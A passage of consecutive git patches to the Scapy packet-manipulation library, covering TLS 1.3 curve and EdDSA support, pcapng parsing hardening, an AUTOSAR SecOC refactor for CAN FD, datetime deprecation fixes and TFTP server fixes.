preferred_ciphersuite=args.pcs, + preferred_signature_algorithm=args.psa, client_auth=args.client_auth, curve=args.curve, cookie=args.cookie, diff --git a/test/scapy/layers/tls/tlsclientserver.uts b/test/scapy/layers/tls/tlsclientserver.uts index ad84b88b6e0..ad0a2166997 100644 --- a/test/scapy/layers/tls/tlsclientserver.uts +++ b/test/scapy/layers/tls/tlsclientserver.uts @@ -156,12 +156,12 @@ def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False if _failed or not _one_success: raise RuntimeError("OpenSSL returned unexpected values") -def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None): +def test_tls_server(suite="", version="", tls13=False, client_auth=False, psk=None, curve=None): msg = ("TestS_%s_data" % suite).encode() # Run server q_ = Queue() th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_), - kwargs={"curve": None, "cookie": False, "client_auth": client_auth, "psk": psk}, + kwargs={"curve": curve, "cookie": False, "client_auth": client_auth, "psk": psk}, name="test_tls_server %s %s" % (suite, version), daemon=True) th_.start() # Synchronise threads @@ -209,6 +209,11 @@ test_tls_server("ECDHE-RSA-AES256-GCM-SHA384", "-tls1_2") test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True) += Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 with x448 curve (+HelloRetryRequest) +~ open_ssl_client + +test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, curve="x448") + = Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 and client auth ~ open_ssl_client From 836e4d598ba3628337f2e3db0543650693757c3f Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 12 Jul 2024 22:15:20 +0200 Subject: [PATCH 1318/1632] Processus index must be 4 bytes (#4455) --- scapy/utils.py | 7 ++++++- test/regression.uts | 5 +++++ 2 files changed, 11 insertions(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 5ab9745fb9a..4caadf04e93 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1880,7 +1880,12 @@ def _read_block_epb(self, block, size): process_information = {} for code, value in options.items(): if code in [0x8001, 0x8003]: # PCAPNG_EPB_PIB_INDEX, PCAPNG_EPB_E_PIB_INDEX - proc_index = struct.unpack(self.endian + "I", value)[0] + try: + proc_index = struct.unpack(self.endian + "I", value)[0] + except struct.error: + warning("PcapNg: EPB invalid proc index" + "(expected 4 bytes, got %d) !" % len(value)) + raise EOFError if proc_index < len(self.process_information): key = "proc" if code == 0x8001 else "eproc" process_information[key] = self.process_information[proc_index] diff --git a/test/regression.uts b/test/regression.uts index fb648178ab1..504ddb50f03 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -2304,6 +2304,7 @@ from io import BytesIO # Issue 68352 file = BytesIO(b"\n\r\r\n\x1c\x00\x00\x00M<+\x1a\x01\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x1c\x00\x00\x00\x01\x00\x00\x00\x14\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x04\x00\x14\x00\x00\x00\x01\x00\x00\x00(\x00\x00\x00\xe4\x00\x00\x00\x00\x00\x04\x00\x02\x00\t\x00b'ens16\xb0'\x00\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x06\x00\x00\x004\x00\x00\x00\x01\x00\x00\x00}\x17\x06\x00\xb5t\x1d\x85\x14\x00\x00\x00\x14\x00\x00\x00E\x00\x00\x14\x00\x01\x00\x00@\x00|\xe7\x7f\x00\x00\x01\x7f\x00\x00\x014\x00\x00\x00") rdpcap(file) + # Issue 68354 file = BytesIO(b'\n\r\r\n\xff\xfe\xfe\xffM<+\x1a') try: @@ -2311,6 +2312,10 @@ try: except Scapy_Exception: pass +# Issue #70115 +file = BytesIO(b"\n\r\r\n\x00\x00\x008\x1a+ Date: Sat, 13 Jul 2024 21:12:18 +0200 Subject: [PATCH 1319/1632] Refactoring of SecOC Layer and implementation for SecOC over CANFD (#4459) * Refactoring of SecOC Layer and implementation for SecOC over CANFD * fix unit test --- scapy/contrib/automotive/autosar/pdu.py | 1 - scapy/contrib/automotive/autosar/secoc.py | 118 ++++-------------- .../contrib/automotive/autosar/secoc_canfd.py | 91 ++++++++++++++ scapy/contrib/automotive/autosar/secoc_pdu.py | 109 ++++++++++++++++ test/contrib/automotive/autosar/secoc.uts | 2 +- test/scapy/layers/can.uts | 48 +++++++ 6 files changed, 271 insertions(+), 98 deletions(-) create mode 100644 scapy/contrib/automotive/autosar/secoc_canfd.py create mode 100644 scapy/contrib/automotive/autosar/secoc_pdu.py diff --git a/scapy/contrib/automotive/autosar/pdu.py b/scapy/contrib/automotive/autosar/pdu.py index 9d88b355c2d..03ec3d3bcc6 100644 --- a/scapy/contrib/automotive/autosar/pdu.py +++ b/scapy/contrib/automotive/autosar/pdu.py @@ -36,7 +36,6 @@ def extract_padding(self, s): class PDUTransport(Packet): """ Packet representing PDUTransport containing multiple PDUs - FIXME: Support CAN messages as well. """ name = 'PDUTransport' fields_desc = [ diff --git a/scapy/contrib/automotive/autosar/secoc.py b/scapy/contrib/automotive/autosar/secoc.py index 867f6e8134f..d93f62aa3c5 100644 --- a/scapy/contrib/automotive/autosar/secoc.py +++ b/scapy/contrib/automotive/autosar/secoc.py @@ -4,13 +4,11 @@ # Copyright (C) Nils Weiss # scapy.contrib.description = AUTOSAR Secure On-Board Communication -# scapy.contrib.status = loads +# scapy.contrib.status = library """ SecOC """ -import struct - from scapy.config import conf from scapy.error import log_loading @@ -21,74 +19,35 @@ log_loading.info("Can't import python-cryptography v1.7+. " "Disabled SecOC calculate_cmac.") -from scapy.base_classes import Packet_metaclass from scapy.config import conf -from scapy.contrib.automotive.autosar.pdu import PDU -from scapy.fields import (XByteField, XIntField, PacketListField, - FieldLenField, PacketLenField, XStrFixedLenField) +from scapy.fields import PacketLenField from scapy.packet import Packet, Raw # Typing imports from typing import ( - Any, Callable, Dict, Optional, Set, - Tuple, Type, ) -class PduPayloadField(PacketLenField): - - __slots__ = ["guess_pkt_cls"] - - def __init__(self, - name, # type: str - default, # type: Packet - guess_pkt_cls, # type: Callable[[Packet, bytes], Packet] # noqa: E501 - length_from=None # type: Optional[Callable[[Packet], int]] # noqa: E501 - ): - # type: (...) -> None - super(PacketLenField, self).__init__(name, default, Raw) - self.length_from = length_from or (lambda x: 0) - self.guess_pkt_cls = guess_pkt_cls - - def m2i(self, pkt, m): # type: ignore - # type: (Optional[Packet], bytes) -> Packet - return self.guess_pkt_cls(pkt, m) - - -class SecOC_PDU(Packet): - name = 'SecOC_PDU' - fields_desc = [ - XIntField('pdu_id', 0), - FieldLenField('pdu_payload_len', None, - fmt="I", - length_of="pdu_payload", - adjust=lambda pkt, x: x + 4), - PduPayloadField('pdu_payload', - Raw(), - guess_pkt_cls=lambda pkt, data: SecOC_PDU.get_pdu_payload_cls(pkt, data), # noqa: E501 - length_from=lambda pkt: pkt.pdu_payload_len - 4), - XByteField("tfv", 0), # truncated freshness value - XStrFixedLenField("tmac", None, length=3)] # truncated message authentication code # noqa: E501 +class SecOCMixin: pdu_payload_cls_by_identifier: Dict[int, Type[Packet]] = dict() secoc_protected_pdus_by_identifier: Set[int] = set() def secoc_authenticate(self) -> None: - self.tfv = struct.unpack(">B", self.get_secoc_freshness_value()[-1:])[0] - self.tmac = self.get_message_authentication_code()[0:3] + raise NotImplementedError def secoc_verify(self) -> bool: - return self.get_message_authentication_code()[0:3] == self.tmac + raise NotImplementedError def get_secoc_payload(self) -> bytes: """Override this method for customization """ - return self.pdu_payload + raise NotImplementedError def get_secoc_key(self) -> bytes: """Override this method for customization @@ -123,56 +82,23 @@ def register_secoc_protected_pdu(cls, @classmethod def unregister_secoc_protected_pdu(cls, pdu_id: int) -> None: cls.secoc_protected_pdus_by_identifier.remove(pdu_id) - del cls.secret_keys_by_identifier[pdu_id] + del cls.pdu_payload_cls_by_identifier[pdu_id] - @classmethod - def dispatch_hook(cls, s=None, *_args, **_kwds): - # type: (Optional[bytes], Any, Any) -> Packet_metaclass - """dispatch_hook determines if PDU is protected by SecOC. - If PDU is protected, SecOC_PDU will be returned, otherwise AutoSAR PDU - will be returned. - """ - if s is None: - return SecOC_PDU - if len(s) < 4: - return Raw - identifier = struct.unpack('>I', s[0:4])[0] - if identifier in cls.secoc_protected_pdus_by_identifier: - return SecOC_PDU - else: - return PDU - @staticmethod - def get_pdu_payload_cls(pkt: Packet, - data: bytes - ) -> Packet: - try: - cls = SecOC_PDU.pdu_payload_cls_by_identifier[pkt.pdu_id] - except KeyError: - cls = conf.raw_layer - return cls(data, _parent=pkt) - - def extract_padding(self, s): - # type: (bytes) -> Tuple[bytes, Optional[bytes]] - return b"", s - - -class SecOC_PDUTransport(Packet): - """ - Packet representing SecOC_PDUTransport containing multiple PDUs - """ - - name = 'SecOC_PDUTransport' - fields_desc = [ - PacketListField("pdus", [SecOC_PDU()], pkt_cls=SecOC_PDU) - ] +class PduPayloadField(PacketLenField): + __slots__ = ["guess_pkt_cls"] - @staticmethod - def register_secoc_protected_pdu(pdu_id: int, - pdu_payload_cls: Type[Packet] = Raw - ) -> None: - SecOC_PDU.register_secoc_protected_pdu(pdu_id, pdu_payload_cls) + def __init__(self, + name, # type: str + default, # type: Packet + guess_pkt_cls, # type: Callable[[Packet, bytes], Packet] # noqa: E501 + length_from=None # type: Optional[Callable[[Packet], int]] # noqa: E501 + ): + # type: (...) -> None + super(PacketLenField, self).__init__(name, default, Raw) + self.length_from = length_from or (lambda x: 0) + self.guess_pkt_cls = guess_pkt_cls - @staticmethod - def unregister_secoc_protected_pdu(pdu_id: int) -> None: - SecOC_PDU.unregister_secoc_protected_pdu(pdu_id) + def m2i(self, pkt, m): # type: ignore + # type: (Optional[Packet], bytes) -> Packet + return self.guess_pkt_cls(pkt, m) diff --git a/scapy/contrib/automotive/autosar/secoc_canfd.py b/scapy/contrib/automotive/autosar/secoc_canfd.py new file mode 100644 index 00000000000..1514b17f35b --- /dev/null +++ b/scapy/contrib/automotive/autosar/secoc_canfd.py @@ -0,0 +1,91 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Nils Weiss + +# scapy.contrib.description = AUTOSAR Secure On-Board Communication PDUs +# scapy.contrib.status = loads + +""" +SecOC PDU +""" +import struct + +from scapy.config import conf +from scapy.contrib.automotive.autosar.secoc import SecOCMixin, PduPayloadField +from scapy.base_classes import Packet_metaclass +from scapy.fields import (XByteField, FieldLenField, XStrFixedLenField, + FlagsField, XBitField, ShortField) +from scapy.layers.can import CANFD +from scapy.packet import Raw, Packet + +# Typing imports +from typing import ( + Any, + Optional, + Tuple, +) + + +class SecOC_CANFD(CANFD, SecOCMixin): + name = 'SecOC_CANFD' + fields_desc = [ + FlagsField('flags', 0, 3, ['error', + 'remote_transmission_request', + 'extended']), + XBitField('identifier', 0, 29), + FieldLenField('length', None, length_of='pdu_payload', + fmt='B', adjust=lambda pkt, x: x + 4), + FlagsField('fd_flags', 4, 8, [ + 'bit_rate_switch', 'error_state_indicator', 'fd_frame']), + ShortField('reserved', 0), + PduPayloadField('pdu_payload', + Raw(), + guess_pkt_cls=lambda pkt, data: SecOC_CANFD.get_pdu_payload_cls(pkt, data), # noqa: E501 + length_from=lambda pkt: pkt.length - 4), + XByteField("tfv", 0), # truncated freshness value + XStrFixedLenField("tmac", None, length=3)] # truncated message authentication code # noqa: E501 + + def secoc_authenticate(self) -> None: + self.tfv = struct.unpack(">B", self.get_secoc_freshness_value()[-1:])[0] + self.tmac = self.get_message_authentication_code()[0:3] + + def secoc_verify(self) -> bool: + return self.get_message_authentication_code()[0:3] == self.tmac + + def get_secoc_payload(self) -> bytes: + """Override this method for customization + """ + return bytes(self.pdu_payload) + + @classmethod + def dispatch_hook(cls, s=None, *_args, **_kwds): + # type: (Optional[bytes], Any, Any) -> Packet_metaclass + """dispatch_hook determines if PDU is protected by SecOC. + If PDU is protected, SecOC_PDU will be returned, otherwise AutoSAR PDU + will be returned. + """ + if s is None: + return SecOC_CANFD + if len(s) < 4: + return Raw + identifier = struct.unpack('>I', s[0:4])[0] & 0x1FFFFFFF + if identifier in cls.secoc_protected_pdus_by_identifier: + return SecOC_CANFD + else: + return CANFD + + @classmethod + def get_pdu_payload_cls(cls, + pkt: Packet, + data: bytes + ) -> Packet: + try: + klass = cls.pdu_payload_cls_by_identifier[pkt.identifier] + except KeyError: + klass = conf.raw_layer + return klass(data, _parent=pkt) + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + return b"", s diff --git a/scapy/contrib/automotive/autosar/secoc_pdu.py b/scapy/contrib/automotive/autosar/secoc_pdu.py new file mode 100644 index 00000000000..169f0bda08c --- /dev/null +++ b/scapy/contrib/automotive/autosar/secoc_pdu.py @@ -0,0 +1,109 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Nils Weiss + +# scapy.contrib.description = AUTOSAR Secure On-Board Communication PDUs +# scapy.contrib.status = loads + +""" +SecOC PDU +""" +import struct + +from scapy.config import conf +from scapy.contrib.automotive.autosar.secoc import SecOCMixin, PduPayloadField +from scapy.base_classes import Packet_metaclass +from scapy.contrib.automotive.autosar.pdu import PDU +from scapy.fields import (XByteField, XIntField, PacketListField, + FieldLenField, XStrFixedLenField) +from scapy.packet import Packet, Raw + +# Typing imports +from typing import ( + Any, + Optional, + Tuple, + Type, +) + + +class SecOC_PDU(Packet, SecOCMixin): + name = 'SecOC_PDU' + fields_desc = [ + XIntField('pdu_id', 0), + FieldLenField('pdu_payload_len', None, + fmt="I", + length_of="pdu_payload", + adjust=lambda pkt, x: x + 4), + PduPayloadField('pdu_payload', + Raw(), + guess_pkt_cls=lambda pkt, data: SecOC_PDU.get_pdu_payload_cls(pkt, data), # noqa: E501 + length_from=lambda pkt: pkt.pdu_payload_len - 4), + XByteField("tfv", 0), # truncated freshness value + XStrFixedLenField("tmac", None, length=3)] # truncated message authentication code # noqa: E501 + + def secoc_authenticate(self) -> None: + self.tfv = struct.unpack(">B", self.get_secoc_freshness_value()[-1:])[0] + self.tmac = self.get_message_authentication_code()[0:3] + + def secoc_verify(self) -> bool: + return self.get_message_authentication_code()[0:3] == self.tmac + + def get_secoc_payload(self) -> bytes: + """Override this method for customization + """ + return self.pdu_payload + + @classmethod + def dispatch_hook(cls, s=None, *_args, **_kwds): + # type: (Optional[bytes], Any, Any) -> Packet_metaclass + """dispatch_hook determines if PDU is protected by SecOC. + If PDU is protected, SecOC_PDU will be returned, otherwise AutoSAR PDU + will be returned. + """ + if s is None: + return SecOC_PDU + if len(s) < 4: + return Raw + identifier = struct.unpack('>I', s[0:4])[0] + if identifier in cls.secoc_protected_pdus_by_identifier: + return SecOC_PDU + else: + return PDU + + @classmethod + def get_pdu_payload_cls(cls, + pkt: Packet, + data: bytes + ) -> Packet: + try: + klass = cls.pdu_payload_cls_by_identifier[pkt.pdu_id] + except KeyError: + klass = conf.raw_layer + return klass(data, _parent=pkt) + + def extract_padding(self, s): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + return b"", s + + +class SecOC_PDUTransport(Packet): + """ + Packet representing SecOC_PDUTransport containing multiple PDUs + """ + + name = 'SecOC_PDUTransport' + fields_desc = [ + PacketListField("pdus", [SecOC_PDU()], pkt_cls=SecOC_PDU) + ] + + @staticmethod + def register_secoc_protected_pdu(pdu_id: int, + pdu_payload_cls: Type[Packet] = Raw + ) -> None: + SecOC_PDU.register_secoc_protected_pdu(pdu_id, pdu_payload_cls) + + @staticmethod + def unregister_secoc_protected_pdu(pdu_id: int) -> None: + SecOC_PDU.unregister_secoc_protected_pdu(pdu_id) diff --git a/test/contrib/automotive/autosar/secoc.uts b/test/contrib/automotive/autosar/secoc.uts index 45c3cd5adcf..a39011fdf26 100644 --- a/test/contrib/automotive/autosar/secoc.uts +++ b/test/contrib/automotive/autosar/secoc.uts @@ -11,7 +11,7 @@ = Load Contrib Layer -load_contrib("automotive.autosar.secoc") +load_contrib("automotive.autosar.secoc_pdu") = Prepare SecOC keys diff --git a/test/scapy/layers/can.uts b/test/scapy/layers/can.uts index 5fb1cc09bbb..8e4a2652c53 100644 --- a/test/scapy/layers/can.uts +++ b/test/scapy/layers/can.uts @@ -1484,3 +1484,51 @@ nan = [x for x in li if math.isnan(x)] assert len(nan) >= 0 assert abs(len(gz) - len(lz)) < (testlen // 10) + ++ SECOC CANFD + += Load SecOC_CANFD + +load_contrib("automotive.autosar.secoc_canfd", globals_dict=globals()) + + += Test SecOC_CANFD build + +#SecOC_CANFD.register_secoc_protected_pdu(0x123) + +pkt = SecOC_CANFD(identifier=0x123, pdu_payload=bytes.fromhex("1122334455667788AABBCCDDEEFF0011")) +pkt.show2() +canfd = CANFD(bytes(pkt)) +canfd.show2() +pkt = SecOC_CANFD(bytes(pkt)) + +assert pkt.identifier == canfd.identifier +assert pkt.data == canfd.data +assert pkt.length == canfd.length + +SecOC_CANFD.register_secoc_protected_pdu(0x123) + +pkt = CANFD(identifier=0x123, data=bytes.fromhex("1122334455667788AABBCCDDEEFF001122334455")) +canfd = CANFD(bytes(pkt)) +canfd.show2() +pkt = SecOC_CANFD(bytes(pkt)) +pkt.show2() + +assert pkt.identifier == canfd.identifier +assert bytes(pkt.pdu_payload) == bytes(canfd.data)[:-4] +assert pkt.length == canfd.length +assert pkt.tfv == 0x22 +assert pkt.tmac == b"\x33\x44\x55" + +pkt.secoc_authenticate() + +assert pkt.tfv == 0 +assert pkt.tmac != b"\x33\x44\x55" + +if conf.crypto_valid: + from cryptography.hazmat.primitives import cmac + from cryptography.hazmat.primitives.ciphers import algorithms + c = cmac.CMAC(algorithms.AES128(b"\x00" * 16)) + c.update(bytes.fromhex("1122334455667788AABBCCDDEEFF0011") + bytes.fromhex("00000000")) + mac = c.finalize() + assert pkt.tmac == mac[:3] \ No newline at end of file From d7ae655aca8a6b6db253862d2750d94219372fba Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 15 Jul 2024 16:24:11 +0200 Subject: [PATCH 1320/1632] Fix WARNING about IPv46 (#4465) --- scapy/arch/linux/__init__.py | 2 +- scapy/layers/inet6.py | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index d08d1bcc026..7bdb17e1265 100644 --- a/scapy/arch/linux/__init__.py +++ b/scapy/arch/linux/__init__.py @@ -344,7 +344,7 @@ def send(self, x): sdto = (iff, conf.l3types.layer2num[type_x]) if sn[3] in conf.l2types: ll = lambda x: conf.l2types.num2layer[sn[3]]() / x - if self.lvl == 3 and type_x != self.LL: + if self.lvl == 3 and not issubclass(self.LL, type_x): warning("Incompatible L3 types detected using %s instead of %s !", type_x, self.LL) self.LL = type_x diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index ad6feaf1a76..8c85719da9f 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -480,7 +480,7 @@ def answers(self, other): return self.payload.answers(other.payload) -class IPv46(IP): +class IPv46(IP, IPv6): """ This class implements a dispatcher that is used to detect the IP version while parsing Raw IP pcap files. From 4a852fee9114cadccb59fe4e7b742b4b316ce3cc Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 15 Jul 2024 22:01:10 +0300 Subject: [PATCH 1321/1632] tree-wide: replace utcnow and utcfromtimestamp (#4462) They were deprecated in https://github.com/python/cpython/issues/103857. Closes https://github.com/secdev/scapy/issues/4460 --- scapy/__init__.py | 6 ++++-- scapy/layers/http.py | 2 +- scapy/layers/kerberos.py | 12 ++++++------ scapy/modules/ticketer.py | 2 +- test/regression.uts | 4 ++-- test/scapy/layers/kerberos.uts | 2 +- 6 files changed, 15 insertions(+), 13 deletions(-) diff --git a/scapy/__init__.py b/scapy/__init__.py index e7fa1a489b3..5854c05fd74 100644 --- a/scapy/__init__.py +++ b/scapy/__init__.py @@ -68,7 +68,7 @@ def _version_from_git_archive(): return _parse_tag(tag) elif tstamp: # archived revision is not tagged, use the commit date - d = datetime.datetime.utcfromtimestamp(int(tstamp)) + d = datetime.datetime.fromtimestamp(int(tstamp), datetime.timezone.utc) return d.strftime('%Y.%m.%d') raise ValueError("invalid git archive format") @@ -162,7 +162,9 @@ def _version(): # Fallback try: # last resort, use the modification date of __init__.py - d = datetime.datetime.utcfromtimestamp(os.path.getmtime(__file__)) + d = datetime.datetime.fromtimestamp( + os.path.getmtime(__file__), datetime.timezone.utc + ) return d.strftime('%Y.%m.%d') except Exception: pass diff --git a/scapy/layers/http.py b/scapy/layers/http.py index 2e211840d55..617e516a1f7 100644 --- a/scapy/layers/http.py +++ b/scapy/layers/http.py @@ -434,7 +434,7 @@ def self_build(self, **kwargs): # Add Content-Length anyways val = str(len(self.payload or b"")) elif f.name == "Date" and isinstance(self, HTTPResponse): - val = datetime.datetime.utcnow().strftime( + val = datetime.datetime.now(datetime.timezone.utc).strftime( '%a, %d %b %Y %H:%M:%S GMT' ) else: diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 385e876db9f..a84903fa192 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -2643,7 +2643,7 @@ def _base_kdc_req(self, now_time): return kdcreq def as_req(self): - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) kdc_req = self._base_kdc_req(now_time=now_time) kdc_req.addresses = [ @@ -2690,7 +2690,7 @@ def as_req(self): return asreq def tgs_req(self): - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) kdc_req = self._base_kdc_req(now_time=now_time) @@ -3836,7 +3836,7 @@ def GSS_Init_sec_context( authenticator=EncryptedData(), ) # Build the authenticator - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) Context.KrbSessionKey = Key.random_to_key( self.SKEY_TYPE, os.urandom(16), @@ -3929,7 +3929,7 @@ def GSS_Init_sec_context( # The client MUST generate an additional AP exchange reply message # exactly as the server would as the final message to send to the # server. - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) cli_ap_rep = KRB_AP_REP(encPart=EncryptedData()) cli_ap_rep.encPart.encrypt( Context.STSessionKey, @@ -4018,7 +4018,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): # Required but not provided. Return an error self._setup_u2u() Context.U2U = True - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) err = KRB_GSSAPI_Token( innerToken=KRB_InnerToken( TOK_ID=b"\x03\x00", @@ -4039,7 +4039,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): tkt = ap_req.ticket.encPart.decrypt(self.KEY) except ValueError as ex: warning("KerberosSSP: %s (bad KEY?)" % ex) - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) err = KRB_GSSAPI_Token( innerToken=KRB_InnerToken( TOK_ID=b"\x03\x00", diff --git a/scapy/modules/ticketer.py b/scapy/modules/ticketer.py index bf721e0c041..3a1895a9161 100644 --- a/scapy/modules/ticketer.py +++ b/scapy/modules/ticketer.py @@ -645,7 +645,7 @@ def create_ticket(self, **kwargs): duration = kwargs.get( "duration", int(self._prompt("Expires in (h) [10]: ") or "10") ) - now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + now_time = datetime.now(timezone.utc).replace(microsecond=0) rand = random.SystemRandom() key = Key.random_to_key( EncryptionType.AES256_CTS_HMAC_SHA1_96, rand.randbytes(32) diff --git a/test/regression.uts b/test/regression.uts index 504ddb50f03..501610ede7a 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -5136,10 +5136,10 @@ assert pl[1][Ether].dst == '00:22:33:44:55:66' = _version() import os -from datetime import datetime +from datetime import datetime, timezone version_filename = os.path.join(scapy._SCAPY_PKG_DIR, "VERSION") -mtime = datetime.utcfromtimestamp(os.path.getmtime(scapy.__file__)) +mtime = datetime.fromtimestamp(os.path.getmtime(scapy.__file__), timezone.utc) version = "2.0.0" with open(version_filename, "w") as fd: fd.write(version) diff --git a/test/scapy/layers/kerberos.uts b/test/scapy/layers/kerberos.uts index aa7e13cc5a6..6874bf8ba6c 100644 --- a/test/scapy/layers/kerberos.uts +++ b/test/scapy/layers/kerberos.uts @@ -1266,7 +1266,7 @@ def fake_choice(x): return x[0] date_mock = mock.MagicMock() -date_mock.utcnow.return_value = datetime(2024, 3, 5, 16, 52, 55, 424801) +date_mock.now.side_effect = lambda tz=None: datetime(2024, 3, 5, 16, 52, 55, 424801, tz) _patches = [ # Patch all the random From 9e461cd1121377e4c93273300cd294e379fecf31 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 16 Jul 2024 16:00:52 +0200 Subject: [PATCH 1322/1632] Fix TFTP_RRQ server (#4469) --- scapy/layers/tftp.py | 19 ++++++++++++++++++- 1 file changed, 18 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tftp.py b/scapy/layers/tftp.py index 0254603b854..742a5a89559 100644 --- a/scapy/layers/tftp.py +++ b/scapy/layers/tftp.py @@ -133,7 +133,13 @@ def answers(self, other): bind_layers(TFTP_OACK, TFTP_Options) +# Automatons + class TFTP_read(Automaton): + """ + TFTP automaton to read a remote file on a TFTP server. + """ + def parse_args(self, filename, server, sport=None, port=69, **kargs): Automaton.parse_args(self, **kargs) self.filename = filename @@ -221,6 +227,10 @@ def END(self): class TFTP_write(Automaton): + """ + TFTP automaton to write a local file onto a TFTP server. + """ + def parse_args(self, filename, data, server, sport=None, port=69, **kargs): Automaton.parse_args(self, **kargs) self.filename = filename @@ -301,6 +311,9 @@ def END(self): class TFTP_WRQ_server(Automaton): + """ + TFTP automaton to wait for incoming files + """ def parse_args(self, ip=None, sport=None, *args, **kargs): Automaton.parse_args(self, *args, **kargs) @@ -378,6 +391,10 @@ def END(self): class TFTP_RRQ_server(Automaton): + """ + TFTP automaton to serve local files + """ + def parse_args(self, store=None, joker=None, dir=None, ip=None, sport=None, serve_one=False, **kargs): # noqa: E501 Automaton.parse_args(self, **kargs) if store is None: @@ -410,7 +427,7 @@ def receive_rrq(self, pkt): @ATMT.state() def RECEIVED_RRQ(self, pkt): ip = pkt[IP] - options = pkt[TFTP_Options] + options = pkt.getlayer(TFTP_Options) self.l3 = IP(src=ip.dst, dst=ip.src) / UDP(sport=self.my_tid, dport=ip.sport) / TFTP() # noqa: E501 self.filename = pkt[TFTP_RRQ].filename.decode("utf-8", "ignore") self.blk = 1 From f199f916c89a0fbe0fbb836e3f580d1e6a70c955 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 17 Jul 2024 11:40:33 +0200 Subject: [PATCH 1323/1632] TLS 1.3: support EdDSA (#4463) --- scapy/asn1/mib.py | 8 ++ scapy/layers/tls/automaton_cli.py | 4 +- scapy/layers/tls/automaton_srv.py | 10 +- scapy/layers/tls/cert.py | 107 +++++++++++++++--- scapy/layers/tls/keyexchange_tls13.py | 23 ++-- scapy/layers/x509.py | 33 ++++++ test/scapy/layers/tls/cert.uts | 40 ++++++- test/scapy/layers/tls/example_server.py | 10 +- test/scapy/layers/tls/pki/README.md | 9 ++ .../scapy/layers/tls/pki/srv_cert_ed25519.pem | 17 +++ test/scapy/layers/tls/pki/srv_key_ed25519.pem | 3 + test/scapy/layers/tls/tlsclientserver.uts | 31 +++-- 12 files changed, 252 insertions(+), 43 deletions(-) create mode 100644 test/scapy/layers/tls/pki/README.md create mode 100644 test/scapy/layers/tls/pki/srv_cert_ed25519.pem create mode 100644 test/scapy/layers/tls/pki/srv_key_ed25519.pem diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index c0bc3a6b7ff..16820fb30dd 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -260,6 +260,13 @@ def load_mib(filenames): "1.3.14.3.2.29": "sha1RSASign", } +# thawte # + +thawte_oids = { + "1.3.101.112": "Ed25519", + "1.3.101.113": "Ed448", +} + # pkcs9 # pkcs9_oids = { @@ -669,6 +676,7 @@ def load_mib(filenames): x509_oids_sets = [ pkcs1_oids, secsig_oids, + thawte_oids, pkcs9_oids, attributeType_oids, certificateExtension_oids, diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 6053c211199..5e442d3f198 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -175,9 +175,11 @@ def parse_args(self, server="127.0.0.1", dport=4433, server_name=None, if supported_signature_algorithms is None: supported_signature_algorithms = [ + "sha256+rsaepss", "sha256+rsa", + "ed25519", + "ed448", ] - supported_signature_algorithms.insert(0, "sha256+rsaepss") self.supported_signature_algorithms = supported_signature_algorithms self.curve = None diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index f586d78e872..d0ad402142b 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -30,7 +30,7 @@ from scapy.automaton import ATMT from scapy.error import warning from scapy.layers.tls.automaton import _TLSAutomaton -from scapy.layers.tls.cert import PrivKeyRSA, PrivKeyECDSA +from scapy.layers.tls.cert import PrivKeyRSA, PrivKeyECDSA, PrivKeyEdDSA from scapy.layers.tls.basefields import _tls_version from 